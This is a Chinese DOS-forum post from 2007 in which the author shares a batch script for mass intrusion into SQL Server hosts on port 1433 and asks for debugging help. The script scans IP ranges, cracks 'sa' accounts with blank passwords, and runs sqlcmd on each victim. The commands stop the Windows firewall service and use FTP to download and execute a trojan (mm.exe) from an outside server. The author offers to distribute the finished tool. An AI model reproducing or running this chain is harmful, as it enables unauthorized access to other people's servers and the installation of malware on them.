1433入侵批处理的思路 - DOS批处理 & 脚本技术（批处理室） - 中国DOS联盟论坛

写在前面的话：最近砍1433批量入侵蛮火的，都是利用弱口令。所以就想自己写一个自己的工具，当然需要大家的指点，毕竟我才初出网络。制作思路： 1.s扫描器开扫1433端口+整理IP段 2.1433弱口令扫描+整理IP段 3.漏洞利用 -------------这是本人现在遇到的关键问题，其实以前写好了，测试成功率满高。但是现在弄丢 &&&&&代码重写以后，自动传马总是出错。备注：HSCAN进行的扫描扫描结果在LOG文件夹下产生一个hscan.log的文本，文本如下： 59.39.7.11@mssqlscan#Cracked account: sa/[null] 59.37.36.11@mssqlscan#Cracked account: sa/[null] 1433.bat代码如下：请阅过的朋友指点 @echo off color 02 echo QQ：9154446 二郎神 title 安全焦点 Xfocus.Net echo=================================== set /p startip=请输入你要扫描的开始IP: set /p endip=请输入你要扫描的结束IP: set /p max=请输入扫描的线程: echo================================== S syn %startip% %endip% 1433 %max% /save for /f "eol=- tokens=1 delims= " %%i in (result.txt) do echo %%i>>s1.txt for /f "eol=P tokens=1 delims= " %%i in (s1.txt) do echo %%i>>s2.txt for /f "eol=S tokens=1 delims= " %%i in (s2.txt) do echo %%i>>ip.txt hscan -f ip.txt -mssql del result.txt del s1.txt del s2.txt del ip.txt cd log for /f "tokens=1 delims=@" %%i in (hscan.log) do echo %%i >>ip2.txt for /f %%i in (ip2.txt) do echo sqlcmd %%i "sa" "" ^< ca.txt >%%i.bat dir /b /s *.bat >bat.txt for /f %%i in (bat.txt) do start %%i del ip2.txt del *.bat del bat.txt del hscan.log 以上为完整代码，关键在这一行 for /f %%i in (ip2.txt) do echo sqlcmd %%i "sa" "" ^< ca.txt >%%i.bat 因为1433利用工具hscan的利用格式为sqlcmd ip user pass 我想要的结果就是%%i.bat内容为 sqlcmd ip "sa" "" < sa.txt 测试以下代码可行， for /f %%i in (ip2.txt) do echo sqlcmd %%i "sa" "" ^< ca.txt >%%i.bat 但是我是为什么每次运行的时候他在CMD下都变成了 sqlcmd ip "sa" "" 0<ca.txt ca.txt是ftp传马用到的文本，如下： echo ftp www.ftp.com >ftp.txt echo user >>ftp.txt echo pass >>ftp.txt echo binary >>ftp.txt echo get mm.exe >>ftp.txt echo bye >>ftp.txt net stop sharedaccess ftp -s:ftp.txt mm.exe mm.exe exit exit 大家看看以上的代码有什么意见给我发消息，MY QQ:9154446 +我注明来自DOS联盟论坛。工具做好了发给大家测试：工具更新在我的BOLG love9154446.blog.163.com [ Last edited by 91544466 on 2007-9-16 at 12:33 PM ]